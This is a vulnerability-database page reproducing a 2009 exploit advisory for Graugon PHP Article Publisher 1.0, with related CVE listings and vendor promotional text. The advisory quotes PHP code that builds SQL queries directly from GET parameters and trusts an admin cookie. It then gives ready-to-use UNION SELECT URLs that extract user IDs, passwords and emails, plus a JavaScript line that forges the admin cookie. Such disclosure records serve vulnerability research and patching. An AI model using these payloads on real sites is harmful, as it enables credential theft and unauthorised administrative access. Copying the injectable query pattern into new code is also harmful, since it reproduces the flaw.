Lucene search
+L

Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling

🗓️ 02 Mar 2009 00:00:00Reported by x0rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling, Bugged Page: index.php, admin.php, view.php, Exploits Availabl

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4807
2 Mar 200900:00
circl
circl
Circl
CVE-2009-4808
1 Nov 200800:00
circl
cve
CVE
CVE-2009-4807
23 Apr 201014:00
cve
cve
CVE
CVE-2009-4808
23 Apr 201014:00
cve
cvelist
Cvelist
CVE-2009-4807
23 Apr 201014:00
cvelist
cvelist
Cvelist
CVE-2009-4808
23 Apr 201014:00
cvelist
exploitdb
Exploit DB
Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling
1 Nov 200800:00
exploitdb
euvd
EUVD
EUVD-2009-4770
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-4771
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4807
23 Apr 201014:30
nvd
Rows per page
#########################################################################################
[0x01] Informations:

Name           : Graugon PHP Article Publisher 1.0
Download       : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability  : Multiple Sql Injections / Insecure Cookie Handling
Author         : x0r
Contact        : [email protected]
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged Page: index.php [..] admin.php [..] view.php

[Code]
$c = $_GET['c'];

$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]

[code]

$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);

[/code]

[code]

$id = $_GET['id']; [..]

$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]

#########################################################################################
[0x03] Exploits:

Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          javascript:document.cookie ="g_admin=1; path=/"

########################################################################################


# milw0rm.com [2009-03-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02762
36